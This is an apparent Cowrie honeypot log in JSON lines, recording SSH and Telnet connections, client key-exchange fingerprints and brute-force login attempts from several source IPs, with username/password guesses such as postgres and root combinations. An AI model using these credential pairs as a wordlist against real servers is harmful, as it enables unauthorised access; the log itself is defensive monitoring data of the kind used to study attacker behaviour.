{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:55:12.045346Z","src_ip":"196.251.86.249","session":"6ab65e3fb31e"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"qwerty","message":"login attempt [postgres/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-26T09:55:14.389474Z","src_ip":"196.251.86.249","session":"6ab65e3fb31e"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:55:16.037476Z","src_ip":"196.251.86.249","session":"6ab65e3fb31e"}
{"eventid":"cowrie.session.closed","duration":46.136980056762695,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:55:44.627328Z","src_ip":"123.31.39.100","session":"b1398859c8aa"}
{"eventid":"cowrie.session.closed","duration":46.07400822639465,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:55:44.634642Z","src_ip":"212.227.125.160","session":"fa241ed70d15"}
{"eventid":"cowrie.session.closed","duration":46.09911775588989,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:55:45.650765Z","src_ip":"212.227.235.229","session":"d71fe934166e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":16736,"dst_ip":"1.2.3.4","dst_port":22,"session":"447ecfa5fe3d","protocol":"ssh","message":"New connection: 212.227.235.229:16736 (1.2.3.4:22) [session: 447ecfa5fe3d]","sensor":"my-vps","timestamp":"2025-08-26T09:55:53.847719Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T09:55:53.849109Z","src_ip":"212.227.235.229","session":"447ecfa5fe3d"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T09:55:53.958248Z","src_ip":"212.227.235.229","session":"447ecfa5fe3d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"sienna","message":"login attempt [admin/sienna] failed","sensor":"my-vps","timestamp":"2025-08-26T09:55:54.482442Z","src_ip":"212.227.235.229","session":"447ecfa5fe3d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"shoot","message":"login attempt [admin/shoot] failed","sensor":"my-vps","timestamp":"2025-08-26T09:55:55.594019Z","src_ip":"212.227.235.229","session":"447ecfa5fe3d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"shitfuck","message":"login attempt [admin/shitfuck] failed","sensor":"my-vps","timestamp":"2025-08-26T09:55:56.703164Z","src_ip":"212.227.235.229","session":"447ecfa5fe3d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"shaun","message":"login attempt [admin/shaun] failed","sensor":"my-vps","timestamp":"2025-08-26T09:55:57.813559Z","src_ip":"212.227.235.229","session":"447ecfa5fe3d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"scotts","message":"login attempt [admin/scotts] failed","sensor":"my-vps","timestamp":"2025-08-26T09:55:58.924638Z","src_ip":"212.227.235.229","session":"447ecfa5fe3d"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:56:00.034522Z","src_ip":"212.227.235.229","session":"447ecfa5fe3d"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":58096,"dst_ip":"1.2.3.4","dst_port":22,"session":"e45dd3a6e3b3","protocol":"ssh","message":"New connection: 196.251.86.249:58096 (1.2.3.4:22) [session: e45dd3a6e3b3]","sensor":"my-vps","timestamp":"2025-08-26T09:56:14.107231Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:56:14.779000Z","src_ip":"196.251.86.249","session":"e45dd3a6e3b3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:56:14.779743Z","src_ip":"196.251.86.249","session":"e45dd3a6e3b3"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"q1w2e3","message":"login attempt [postgres/q1w2e3] failed","sensor":"my-vps","timestamp":"2025-08-26T09:56:16.939667Z","src_ip":"196.251.86.249","session":"e45dd3a6e3b3"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:56:18.583938Z","src_ip":"196.251.86.249","session":"e45dd3a6e3b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63772,"dst_ip":"1.2.3.4","dst_port":23,"session":"54d9df55ef83","protocol":"telnet","message":"New connection: 212.227.235.229:63772 (1.2.3.4:23) [session: 54d9df55ef83]","sensor":"my-vps","timestamp":"2025-08-26T09:56:23.728413Z"}
{"eventid":"cowrie.session.closed","duration":31.353519678115845,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:56:55.082057Z","src_ip":"212.227.235.229","session":"54d9df55ef83"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":59252,"dst_ip":"1.2.3.4","dst_port":22,"session":"26c6b67d43bb","protocol":"ssh","message":"New connection: 196.251.86.249:59252 (1.2.3.4:22) [session: 26c6b67d43bb]","sensor":"my-vps","timestamp":"2025-08-26T09:57:15.454535Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:57:16.184883Z","src_ip":"196.251.86.249","session":"26c6b67d43bb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:57:16.186171Z","src_ip":"196.251.86.249","session":"26c6b67d43bb"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"q1w2e3r4","message":"login attempt [postgres/q1w2e3r4] failed","sensor":"my-vps","timestamp":"2025-08-26T09:57:18.055400Z","src_ip":"196.251.86.249","session":"26c6b67d43bb"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:57:19.233499Z","src_ip":"196.251.86.249","session":"26c6b67d43bb"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":60126,"dst_ip":"1.2.3.4","dst_port":22,"session":"74cab8da6849","protocol":"ssh","message":"New connection: 196.251.86.249:60126 (1.2.3.4:22) [session: 74cab8da6849]","sensor":"my-vps","timestamp":"2025-08-26T09:58:16.503478Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:58:17.321544Z","src_ip":"196.251.86.249","session":"74cab8da6849"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:58:17.322324Z","src_ip":"196.251.86.249","session":"74cab8da6849"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"1q2w3e","message":"login attempt [postgres/1q2w3e] failed","sensor":"my-vps","timestamp":"2025-08-26T09:58:19.184684Z","src_ip":"196.251.86.249","session":"74cab8da6849"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:58:20.792629Z","src_ip":"196.251.86.249","session":"74cab8da6849"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":51378,"dst_ip":"1.2.3.4","dst_port":22,"session":"67d9124d10d0","protocol":"ssh","message":"New connection: 45.88.8.215:51378 (1.2.3.4:22) [session: 67d9124d10d0]","sensor":"my-vps","timestamp":"2025-08-26T09:58:26.336125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:58:26.695030Z","src_ip":"45.88.8.215","session":"67d9124d10d0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T09:58:26.695868Z","src_ip":"45.88.8.215","session":"67d9124d10d0"}
{"eventid":"cowrie.login.success","username":"root","password":"Madan@123","message":"login attempt [root/Madan@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:58:29.327518Z","src_ip":"45.88.8.215","session":"67d9124d10d0"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:58:29.813777Z","src_ip":"45.88.8.215","session":"67d9124d10d0"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":33472,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e7693443e0a","protocol":"ssh","message":"New connection: 196.251.86.249:33472 (1.2.3.4:22) [session: 4e7693443e0a]","sensor":"my-vps","timestamp":"2025-08-26T09:59:17.999843Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:59:18.821153Z","src_ip":"196.251.86.249","session":"4e7693443e0a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:59:18.821856Z","src_ip":"196.251.86.249","session":"4e7693443e0a"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"1q2w3e4r","message":"login attempt [postgres/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-08-26T09:59:20.664710Z","src_ip":"196.251.86.249","session":"4e7693443e0a"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:59:22.371597Z","src_ip":"196.251.86.249","session":"4e7693443e0a"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":33880,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad78c5e7b62c","protocol":"ssh","message":"New connection: 45.88.8.186:33880 (1.2.3.4:22) [session: ad78c5e7b62c]","sensor":"my-vps","timestamp":"2025-08-26T09:59:27.968687Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:59:28.813333Z","src_ip":"45.88.8.186","session":"ad78c5e7b62c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T09:59:28.814017Z","src_ip":"45.88.8.186","session":"ad78c5e7b62c"}
{"eventid":"cowrie.login.success","username":"root","password":"19531954","message":"login attempt [root/19531954] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:59:31.775807Z","src_ip":"45.88.8.186","session":"ad78c5e7b62c"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:59:32.444533Z","src_ip":"45.88.8.186","session":"ad78c5e7b62c"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":35596,"dst_ip":"1.2.3.4","dst_port":22,"session":"11441f9d3b22","protocol":"ssh","message":"New connection: 196.251.86.249:35596 (1.2.3.4:22) [session: 11441f9d3b22]","sensor":"my-vps","timestamp":"2025-08-26T10:00:20.778891Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:00:21.167233Z","src_ip":"196.251.86.249","session":"11441f9d3b22"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:00:21.168318Z","src_ip":"196.251.86.249","session":"11441f9d3b22"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"111111","message":"login attempt [postgres/111111] failed","sensor":"my-vps","timestamp":"2025-08-26T10:00:22.889659Z","src_ip":"196.251.86.249","session":"11441f9d3b22"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:00:24.531387Z","src_ip":"196.251.86.249","session":"11441f9d3b22"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58594,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c488659c866","protocol":"ssh","message":"New connection: 217.72.205.35:58594 (1.2.3.4:22) [session: 2c488659c866]","sensor":"my-vps","timestamp":"2025-08-26T10:01:01.022071Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:01:01.024338Z","src_ip":"217.72.205.35","session":"2c488659c866"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":36140,"dst_ip":"1.2.3.4","dst_port":22,"session":"17baf034b63c","protocol":"ssh","message":"New connection: 196.251.86.249:36140 (1.2.3.4:22) [session: 17baf034b63c]","sensor":"my-vps","timestamp":"2025-08-26T10:01:22.234944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:01:22.848357Z","src_ip":"196.251.86.249","session":"17baf034b63c"}
